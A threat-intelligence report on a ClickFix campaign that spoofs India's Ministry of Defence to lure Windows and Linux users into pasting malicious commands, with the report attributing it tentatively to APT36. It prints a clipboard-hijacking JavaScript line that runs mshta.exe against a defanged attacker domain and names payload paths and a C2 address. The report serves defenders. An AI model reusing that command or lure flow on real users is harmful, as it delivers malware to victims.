APT36-Style ClickFix Attack Spoofs Indian Ministry to Target Windows & Linux

Threat actors continue to adopt recognizable branding and official imagery to lower suspicion and facilitate malware execution. Infrastructure spoofing India's Ministry of Defence was recently observed delivering cross-platform malware through a ClickFix-style infection chain. The site mimicked government press releases, staged payloads through a possibly compromised .in domain, and used visual deception to appear credible during execution.

This activity mirrors patterns seen in other ClickFix cases-reuse of public-sector branding, staging malware in web asset directories, and targeting Windows and Linux to maximize effectiveness.

Initial Landing Page: Fake Ministry Press Release Portal

While surveying domains imitating official government websites, Hunt.io identified email.gov.in.drdosurvey[.]info serving content spoofing India's Ministry of Defence. Visiting the site in a browser opened a page mimicking the Ministry's official press release archive, with structure and layout closely modeled on the legitimate portal.

A comparison of the URL paths is below:

Legitimate: /index.php/en/press-releases-ministry-defence-0\
Malicious:  /content/press-releases-ministry-defence-0.html

The threat actor(s) attempted to recreate the Ministry's public document archive, typically listing monthly press releases from September 2023 through April 2025. However, on the cloned page, only a single link-corresponding to March 2025-was active, while all other months displayed a static "No Data" status.

Reviewing the cloned portal's source code revealed that the page had been created using HTTrack, a publicly available website copying tool. Metadata embedded within the HTML suggested the cloning occurred in early March 2025.

Threat actors attempted to recreate the Ministry's public document archive, typically listing monthly press releases from September 2023 through April 2025. However, on the cloned portal, only a single link-corresponding to March 2025-was active, while all other months displayed a static "No Data" status.

ClickFix Technique Observations

Clicking the only active link on the cloned press release portal-labeled March 2025-initiates a ClickFix-style social engineering flow. The user is directed to one of two PHP pages depending on their operating system:

Windows: /captcha/windows.php
Linux:   /captcha/linux.php

This section focuses on the Linux-specific flow, which appears less mature and may still be under development.

Linux Flow: CAPTCHA Lure and Shell Command Execution

The Linux CAPTCHA page presents a minimal interface with a single blue button labeled, "I'm not a rebot"-a misspelling possibly either a typo or introduced intentionally to avoid automated scanning for similar web pages.

Upon clicking the button, a shell command is silently copied to the user's clipboard. If pasted and executed in a terminal, the command downloads a shell script named mapeal.sh from https://trade4wealth[.]in/admin/assets/js/, grants it execute permissions via chmod +x, and then runs it immediately. The domain used for payload delivery- trade4wealth[.]in-is assessed as a likely compromised or abandoned asset, repurposed as part of the delivery infrastructure.

Immediately after copying the payload command, the user is redirected to linux-guide.php, which displays a verification overlay and a set of instructions:

1. Press ALT + F2
2. Press CTRL + V
3. Press Enter

The page presents the next phase of the ClickFix flow: a spoofed CAPTCHA overlay paired with step-by-step instructions designed to trick users into executing clipboard-based shell commands.

Behind the overlay, the background appears to be a static image containing a faint watermark from PCRisk, a legitimate cybersecurity information site that publishes malware removal guides and threat analysis. The inclusion of this image may be intended to mimic the appearance of a trusted security interface and reduce suspicion during execution.

As of this writing, the Linux payload ( mapeal.sh) performs no observable malicious behavior. The script downloads a JPEG image from the same trade4wealth[.]in directory and opens it in the background. No additional activity, such as persistence mechanisms, lateral movement, or outbound communication, was observed during execution.

Windows Flow: FOUO Warning and mshta-Based Payload Delivery

On Windows systems, clicking the March 2025 link redirects the user to /captcha/windows.php, which displays a full-screen overlay mimicking a government-style disclosure warning labeled "For Official Use Only (FOUO)." The background image appears to be a blurred capture of the official yoga.ayush.gov[.]in portal, a legitimate website operated by India's Ministry of AYUSH to promote yoga and wellness programs.

After clicking the Continue button, the user is served a second-stage ClickFix sequence. A JavaScript function silently copies a malicious command to the clipboard, instructing the user to paste and execute it in the terminal. The payload is executed via mshta.exe, invoking a remote script hosted on the attacker-controlled infrastructure:

const calcPath = "C:\\Windows\\System32\\mshta.exe https://trade4wealth[.]in/admin/assets/css/default/index.php"; navigator.clipboard.writeText(calcPath)

When accessed directly, index.php redirects to a second-stage payload at:

https://trade4wealth[.]in/admin/assets/css/default/sysinte.hta

This HTA file contains hundreds of lines of obfuscated JavaScript using hexadecimal escape sequences, designed to hinder static analysis.

Dynamic analysis of the decoded payload revealed a .NET-based loader, which initiates outbound connections to the IP address 185.117.90[.]212. This host also resolves to a spoofed subdomain: email.gov.in.avtzyu[.]store.

While the malware executes in the background, the user is shown a decoy document-an apparently legitimate press release themed around the Indian Ministry of Defence. The PDF appears to have been cloned directly from the actual press release portal, likely intended to reinforce the illusion of legitimacy.

Operator Traits and Attribution

Several observable traits across this campaign can help defenders identify related malicious infrastructure and anticipate future staging activity:

• Domains mimicking Indian government subdomains, particularly variations of email.gov[.]in, appended to attacker-controlled parent domains (e.g., drdosurvey[.]info, avtzyu[.]store).

• Use of Namecheap as a registrar, and registrar-servers[.]com nameservers-both commonly abused in malicious activity.

• HTA payloads staged deep in URL paths masquerading as benign directories.

• Spelling anomalies, such as "I'm not a rebot" and "officia use only", may reflect a deliberate attempt to bypass pattern-based detection or user familiarity.

• Cross-platform delivery using clipboard-based execution on both Windows (mshta.exe) and Linux (curl + chmod + bash) further supports staging flexibility.

Attribution Assessment

While attribution remains unconfirmed, the tradecraft observed in this campaign-use of government-themed lure content, HTA-based delivery, decoy documents, and operational targeting of Indian government infrastructure-is consistent with historic activity attributed to APT36 (also known as Transparent Tribe).

APT36 is a Pakistan-aligned threat actor known for:

• Longstanding focus on Indian government, military, and diplomatic targets.

• Repeated use of .NET-based malware, HTA delivery, and cloned login or press release content.

• Infrastructure that frequently includes typosquatting, misuse of legitimate services, and publicly visible scripting errors.

Based on these overlaps, this activity is assessed with medium confidence to align with APT36's broader targeting and operational patterns.

Final thoughts

This campaign reflects a familiar playbook with subtle adjustments: cloned government branding, decoy files, and low-friction execution paths tailored to each operating system. While not technically advanced, the operators showed clear intent in crafting believable lures and maintaining control over payload delivery across different platforms.

The inclusion of press release theming, clipboard-based execution, and reused security imagery fits a pattern seen in prior APT36 activity. If not definitive, it's a strong indication that known actors are continuing to test ClickFix-style techniques in new contexts.

For defenders, the takeaway isn't tied to a single technique-it's the way familiar methods are being reused in slightly new combinations. Look for signs like clipboard-delivered commands, spoofed government subdomains, shallow clones of trusted sites, and payloads staged under common web folders. These small patterns, when seen together, often reveal a larger campaign taking shape. We've observed similar patterns in our previous research on ClickFix infrastructure, where early-stage domains showed many of the same traits.

APT36-Like Infrastructure Network Observables and Indicators of Compromise (IOCs)

APT36-Like Infrastructure Host Observables and Indicators of Compromise (IOCs)